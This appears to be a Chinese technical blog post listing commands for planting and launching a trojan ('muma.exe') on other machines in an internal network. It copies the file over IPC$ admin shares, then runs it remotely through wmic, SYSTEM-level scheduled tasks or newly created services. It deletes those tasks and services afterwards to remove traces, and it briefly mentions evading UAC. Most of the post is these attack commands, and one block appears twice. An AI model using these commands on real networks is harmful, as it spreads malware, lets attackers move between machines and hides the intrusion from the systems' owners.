内网IPC$种马的三种方法
2015-06-04 09:19
232 查看
copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件
WMIC远程运行命令
wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”
schtasks计划任务远程运行
schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System schtasks /run /tn foobar /S host schtasks /F /delete /tn foobar /S host ##清除schtasks
SC添加服务远程运行命令
sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ##新建服务,指向拷贝的木马路径 sc \\host start foobar ##启动建立的服务 sc \\host delete foobar ##完事后删除服务
20150805:
1、系统权限 sc \\10.1.1.1 create winnt binpath= c:\cmd.exe sc \\10.1.1.1 start winnt sc \\10.1.1.1 delete winnt
2.指定用户权限启动 sc \\10.1.1.1 create adminsec binpath = “c:\pass.exe” obj= “adminsec\administrator” passwrod= adminsec sc \\10.1.1.1 start adminsec
个人有些想法就是通过powershell去可以避免uac什么什么的,后续整理了补发一下。
WMIC远程运行命令
wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”
schtasks计划任务远程运行
schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System schtasks /run /tn foobar /S host schtasks /F /delete /tn foobar /S host ##清除schtasks
SC添加服务远程运行命令
sc \\host create foobar binpath=“c:\windows\temp\foobar.exe” ##新建服务,指向拷贝的木马路径 sc \\host start foobar ##启动建立的服务 sc \\host delete foobar ##完事后删除服务
20150805:
1、系统权限 sc \\10.1.1.1 create winnt binpath= c:\cmd.exe sc \\10.1.1.1 start winnt sc \\10.1.1.1 delete winnt
2.指定用户权限启动 sc \\10.1.1.1 create adminsec binpath = “c:\pass.exe” obj= “adminsec\administrator” passwrod= adminsec sc \\10.1.1.1 start adminsec
个人有些想法就是通过powershell去可以避免uac什么什么的,后续整理了补发一下。
相关文章推荐
- Android NDK开发篇(一):新版NDK环境搭建(免Cygwin,超级快)
- 抓住本质问题:读《戒嗔的白粥馆》 有感
- 实验四
- 实验三
- 深度学习综述(LeCun、Bengio和Hinton)
- JS对于Android和IOS平台的点击响应的适配
- (转)App工程结构搭建:几种常见Android代码架构分析
- [转载] Docker背后的容器管理——Libcontainer深度解析
- 构建 iOS 风格移动 Web 应用程序的8款开发框架
- Win7 64位中MinGW和MSYS的安装
- 都是自动挡,AT/CVT/AMT双离合究竟谁最强?
- jquery datagrid 参数及使用
- C#的百度地图开发(三)依据坐标获取位置、商圈及周边信息
- 【转】Android HAL实例解析
- Android 应用开发推荐书单
- MYSQL下什么命令查看当前正在使用的数据库
- Letex画复杂表格的方法
- Yii2-多表关联查询(with、join、joinwith)示例
- 一个简单的QQ登陆界面
- 常对象、常对象成员、常成员函数